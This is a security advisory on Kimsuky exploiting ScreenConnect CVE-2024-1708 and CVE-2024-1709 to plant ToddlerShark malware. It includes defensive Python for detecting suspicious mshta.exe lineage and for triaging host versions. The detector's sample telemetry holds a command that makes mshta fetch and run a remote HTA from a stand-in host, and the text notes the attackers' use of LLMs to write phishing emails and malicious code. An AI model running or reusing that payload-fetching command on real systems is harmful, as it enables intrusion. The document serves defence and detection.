North Korea state-aligned cyber actors exploit ScreenConnect flaw to deploy ToddlerShark malware

Target Industry

Managed Service Providers, and organisations using ConnectWise ScreenConnect for remote access.

Overview

Two security flaws in ConnectWise ScreenConnect, tracked as CVE-2024-1708 and CVE-2024-1709, have been actively exploited by the North Korean state-sponsored group tracked as Emerald Sleet (also known as Kimsuky). Exploitation of these Common Vulnerabilities and Exposures (CVEs) has allowed the Pyongyang state-aligned threat actors to bypass authentication and achieve remote code execution, resulting in targets being infected with a new malware variant tracked as “ToddlerShark”.

Attack Chain

The threat actor gains initial access by exploiting the setup wizard of the ScreenConnect application. With hands-on-keyboard access, the actor uses cmd.exe to launch mshta.exe, which connects to a URL hosting Visual Basic (VB) malware. The MSHTA utility then downloads an obfuscated VBScript payload. Each download differs because the malware is polymorphic, meaning no two file hashes are the same.
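Because the payload is polymorphic, hash-based indicators will not catch it; the stable part of the chain above is the process lineage (a ScreenConnect process spawning cmd.exe, which launches mshta.exe with a remote URL). The following script is an added example, not code from the bulletin or from ConnectWise, that scores process-creation events on those three traits. The telemetry is constructed sample data in a Sysmon Event ID 1 style, and the ScreenConnect executable name is assumed for illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style)."""
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged


# Constructed sample telemetry, not real log data. The ScreenConnect image name
# is an assumption used for illustration; the check matches on the vendor prefix.
SAMPLE_EVENTS = [
    ProcEvent(400, 4, r"C:\Program Files (x86)\ScreenConnect\Bin\ScreenConnect.Service.exe",
              "ScreenConnect.Service.exe"),
    ProcEvent(1200, 400, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c mshta http://example.invalid/loader.hta"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\mshta.exe",
              "mshta http://example.invalid/loader.hta"),
    # Benign noise: an interactive user running a local HTA from a shell.
    ProcEvent(2000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(2200, 2100, r"C:\Windows\System32\mshta.exe",
              r"mshta C:\Users\alice\Desktop\report.hta"),
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def lineage(by_pid: dict, pid: int, max_depth: int = 6) -> list:
    """Walk parent links upward; returns [self, parent, grandparent, ...]."""
    chain = []
    cur = by_pid.get(pid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events: list) -> list:
    """Score every mshta.exe launch on the traits the bulletin describes.

    A hit needs a score of at least 3, so a remote URL or a cmd.exe parent
    alone is not enough; the ScreenConnect ancestry is weighted highest.
    """
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if image_name(e.image) != "mshta.exe":
            continue
        names = [image_name(a.image) for a in lineage(by_pid, e.pid)]
        reasons = []
        if URL_RE.search(e.cmdline):
            reasons.append("mshta.exe fetches a remote URL")
        if len(names) > 1 and names[1] == "cmd.exe":
            reasons.append("launched via cmd.exe (hands-on-keyboard pattern)")
        if any(n.startswith("screenconnect") for n in names[1:]):
            reasons.append("ancestor is a ScreenConnect process")
            score = len(reasons) + 1   # RMM lineage counts double
        else:
            score = len(reasons)
        if score >= 3:
            hits.append({"pid": e.pid, "score": score,
                         "reasons": reasons, "lineage": names})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Run against the sample events, only the mshta.exe launch descended from the ScreenConnect process is reported; the local HTA opened from an Explorer-spawned shell scores 1 and is ignored. In production the same logic maps directly onto an EDR or SIEM query over process-creation events, with the threshold tuned to the environment's normal mshta.exe usage.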

Impact

Successful exploitation of CVE-2024-1708 and CVE-2024-1709 would likely allow threat actors to bypass authentication using an alternate path or channel, leading to the infection of the host. Further malicious operations could subsequently be performed, including data and information gathering, and exfiltration to the attacker’s command-and-control (C2) infrastructure.

Vulnerability Detection

ConnectWise has released security updates for the reported vulnerabilities in the affected ScreenConnect product versions; as such, earlier, unpatched versions remain vulnerable to exploitation.

Affected Products

CVE-2024-1708 and CVE-2024-1709 have been discovered to affect ScreenConnect 23.9.7 and prior versions.

Containment, Mitigations & Remediations

It is strongly recommended that users apply the relevant security patches as a matter of urgency, or discontinue use of the product if mitigations are unavailable. Systems that have run ScreenConnect 23.9.7 or prior should be assumed compromised even after patching.
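The two statements above (patch anything at 23.9.7 or below; treat anything that ever ran 23.9.7 or below as compromised) translate into a simple inventory triage. The script below is an added example, not from the bulletin or from ConnectWise; the inventory rows are constructed placeholders, and it assumes that any version numerically above 23.9.7 is outside the affected range. It compares versions component by component, because a plain string comparison would rank a hypothetical "23.9.10" below "23.9.7" and mis-classify a patched host.

```python
LAST_AFFECTED = (23, 9, 7)   # bulletin: ScreenConnect 23.9.7 and prior are affected


def parse_version(text: str) -> tuple:
    """'23.9.10' -> (23, 9, 10); padded to three parts so '23.9' compares as 23.9.0."""
    parts = [int(p) for p in text.strip().split(".")]
    if not parts or len(parts) > 3:
        raise ValueError(f"unexpected version format: {text!r}")
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version: str) -> bool:
    """Numeric comparison against the last affected release (assumption:
    anything above 23.9.7 is treated as outside the affected range)."""
    return parse_version(version) <= LAST_AFFECTED


ACTION_PATCH = "patch immediately or take out of service"
ACTION_INVESTIGATE = "assume compromise: investigate, even if now patched"


def triage(inventory: list) -> dict:
    """inventory rows: (host, current_version, earliest_version_seen).

    Returns host -> list of actions drawn from the bulletin's guidance.
    """
    actions = {}
    for host, current, earliest in inventory:
        todo = []
        if is_affected(current):
            todo.append(ACTION_PATCH)
        if is_affected(earliest):
            todo.append(ACTION_INVESTIGATE)
        actions[host] = todo or ["no action"]
    return actions


# Constructed sample inventory; host names and versions are placeholders.
SAMPLE_INVENTORY = [
    ("sc-srv-01", "23.9.7", "23.9.7"),    # still on an affected build
    ("sc-srv-02", "23.9.10", "23.9.5"),   # patched, but was exposed earlier
    ("sc-srv-03", "23.9.8", "23.9.8"),    # installed after the fix
    ("sc-srv-04", "22.8.3", "22.8.3"),    # old build, never patched
]


if __name__ == "__main__":
    for host, todo in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {'; '.join(todo)}")
```

The "earliest version seen" column is the one that matters for the compromise assessment: a host that is fully patched today still needs investigating if it was ever exposed on an affected build.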

Indicators of Compromise

No specific Indicators of Compromise (IoCs) are available currently. However, when further intelligence becomes available, this will be updated.

Threat Landscape

ScreenConnect holds a significant share of the professional services automation (PSA) and remote monitoring and management (RMM) software market. Given that threat actors generally weigh the probability of success against asset value when deciding which attack surfaces to focus on, ScreenConnect products have become a prime target throughout Q1 2024. Because such software has become an integral part of business operations across the industry spectrum, threat actors will continue to exploit vulnerabilities in the associated products in an attempt to extract the sensitive information they hold.

This exploitation highlights the ongoing risk associated with software vulnerabilities, particularly given the prevalent use of remote access tools by individuals and organisations. Because remote working will continue, such attacks are expected to remain widespread. Organisations need to manage their vulnerabilities quickly and respond to such incidents in a timely fashion.

Threat Actor

Emerald Sleet has been active since at least 2012 and primarily targets governments, nuclear organisations, and foreign relations entities to collect intelligence that furthers North Korea’s state interests. The advanced persistent threat (APT) unit started by targeting South Korean government entities and think tanks before expanding its target list to include organisations in any sector in Europe, Russia, and the US.

The Pyongyang-aligned threat actor group is known for leveraging spear-phishing campaigns with backdoor malware as their main tactic. Recent intelligence indicates that Emerald Sleet has been linked to the utilisation of large language models (LLMs) for crafting phishing emails and generating malicious code.

Most recently, the US Department of the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned Emerald Sleet for its cyber espionage efforts in supporting North Korea’s strategic objectives.